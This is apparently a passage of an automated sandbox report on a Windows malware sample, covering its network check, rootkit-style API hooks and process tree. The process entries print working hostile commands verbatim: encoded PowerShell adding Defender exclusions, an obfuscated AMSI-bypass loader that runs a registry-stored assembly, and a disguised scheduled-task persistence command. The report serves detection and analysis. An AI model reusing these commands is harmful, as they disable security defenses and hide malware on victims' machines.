                          Mar 27, 2022 01:40:58.679579973 CET192.168.2.48.8.8.80xec82Standard query (0)ip-api.comA (IP address)IN (0x0001)
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Mar 27, 2022 01:40:58.696609020 CET8.8.8.8192.168.2.40xec82No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)
                          • ip-api.com
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          0 | 192.168.2.4 | 49735 | 208.95.112.1 | 80 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

                          Timestamp | kBytes transferred | Direction | Data
                          Mar 27, 2022 01:40:58.753820896 CET | 827 | OUT | GET /line/?fields=hosting HTTP/1.1
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Mar 27, 2022 01:40:58.785864115 CET | 827 | IN | HTTP/1.1 200 OK
                          Date: Sun, 27 Mar 2022 00:40:57 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 5
                          Access-Control-Allow-Origin: *
                          X-Ttl: 60
                          X-Rl: 44
                          Data Raw: 74 72 75 65 0a
                          Data Ascii: true


                          Code Manipulations

                          Function Name | Hook Type | Active in Processes
                          ZwEnumerateKey | INLINE | explorer.exe, winlogon.exe
                          NtQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
                          ZwResumeThread | INLINE | explorer.exe, winlogon.exe
                          NtDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
                          ZwDeviceIoControlFile | INLINE | explorer.exe, winlogon.exe
                          NtEnumerateKey | INLINE | explorer.exe, winlogon.exe
                          NtQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe
                          ZwEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
                          ZwQuerySystemInformation | INLINE | explorer.exe, winlogon.exe
                          NtResumeThread | INLINE | explorer.exe, winlogon.exe
                          RtlGetNativeSystemInformation | INLINE | explorer.exe, winlogon.exe
                          NtQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
                          NtEnumerateValueKey | INLINE | explorer.exe, winlogon.exe
                          ZwQueryDirectoryFileEx | INLINE | explorer.exe, winlogon.exe
                          ZwQueryDirectoryFile | INLINE | explorer.exe, winlogon.exe

                          Function Name | Hook Type | New Data
                          ZwEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF
                          ZwResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F
                          NtDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F
                          ZwDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F
                          NtEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF
                          ZwEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F
                          RtlGetNativeSystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          NtEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          ZwQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF

                          Function Name | Hook Type | New Data
                          ZwEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF
                          ZwResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F
                          NtDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F
                          ZwDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F
                          NtEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF
                          NtQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF
                          ZwEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F
                          RtlGetNativeSystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF
                          NtQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          NtEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F
                          ZwQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF
                          ZwQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF

                          Target ID:1
                          Start time:01:40:46
                          Start date:27/03/2022
                          Path:C:\Users\user\Desktop\Install.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Install.exe"
                          Imagebase:0x400000
                          File size:4713759 bytes
                          MD5 hash:280BFD5EA1F41586EA0EF60EE44BC8DB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Target ID:2
                          Start time:01:40:47
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
                          Imagebase:0x400000
                          File size:5028144 bytes
                          MD5 hash:D55DC38B4EE6BED2168E74194533C572
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 50%, Virustotal, Browse
                          Reputation:low

                          Target ID:3
                          Start time:01:40:48
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:4
                          Start time:01:40:48
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\34432.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\34432.exe
                          Imagebase:0x770000
                          File size:2366976 bytes
                          MD5 hash:04F6704BD3AB97905A497BAF3D7FDB3C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\34432.exe, Author: Arnim Rupp
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 35%, Virustotal, Browse
                          • Detection: 77%, ReversingLabs
                          Reputation:low

                          Target ID:5
                          Start time:01:40:49
                          Start date:27/03/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Imagebase:0xbe0000
                          File size:98912 bytes
                          MD5 hash:6807F903AC06FF7E1670181378690B22
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:6
                          Start time:01:40:58
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:7
                          Start time:01:40:59
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:8
                          Start time:01:40:59
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:20
                          Start time:01:41:27
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:22
                          Start time:01:41:36
                          Start date:27/03/2022
                          Path:C:\Windows\System32\nslookup.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\nslookup.exe
                          Imagebase:0x7ff6e2e30000
                          File size:86528 bytes
                          MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Target ID:23
                          Start time:01:41:41
                          Start date:27/03/2022
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
                          Imagebase:0xdd0000
                          File size:430592 bytes
                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:24
                          Start time:01:41:41
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:25
                          Start time:01:41:42
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:26
                          Start time:01:41:42
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:27
                          Start time:01:41:45
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:28
                          Start time:01:41:46
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:29
                          Start time:01:41:46
                          Start date:27/03/2022
                          Path:C:\Windows\System32\schtasks.exe
                          Wow64 process (32bit):false
                          Commandline:schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
                          Imagebase:0x7ff71aea0000
                          File size:226816 bytes
                          MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:30
                          Start time:01:41:47
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0x20000
                          File size:2366976 bytes
                          MD5 hash:04F6704BD3AB97905A497BAF3D7FDB3C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, Author: Arnim Rupp
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 77%, ReversingLabs

                          Target ID:31
                          Start time:01:41:48
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0x7ff7fc480000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:32
                          Start time:01:41:49
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:33
                          Start time:01:41:50
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0xfa0000
                          File size:2366976 bytes
                          MD5 hash:04F6704BD3AB97905A497BAF3D7FDB3C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Target ID:36
                          Start time:01:42:09
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:37
                          Start time:01:42:10
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7748d0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:38
                          Start time:01:42:11
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Target ID:39
                          Start time:01:42:19
                          Start date:27/03/2022
                          Path:C:\Windows\System32\dllhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
                          Imagebase:0x7ff6535c0000
                          File size:20888 bytes
                          MD5 hash:2528137C6745C4EADD87817A1909677E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:42
                          Start time:01:42:25
                          Start date:27/03/2022
                          Path:C:\Windows\System32\winlogon.exe
                          Wow64 process (32bit):false
                          Commandline:winlogon.exe
                          Imagebase:0x7ff775840000
                          File size:677376 bytes
                          MD5 hash:F9017F2DC455AD373DF036F5817A8870
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:43
                          Start time:01:42:29
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:44
                          Start time:01:42:29
                          Start date:27/03/2022
                          Path:C:\Windows\System32\lsass.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\lsass.exe
                          Imagebase:0x7ff765a60000
                          File size:57976 bytes
                          MD5 hash:317340CD278A374BCEF6A30194557227
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:45
                          Start time:01:42:34
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:46
                          Start time:01:42:35
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Target ID:47
                          Start time:01:42:37
                          Start date:27/03/2022
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay
                          Imagebase:0x7ff7338d0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
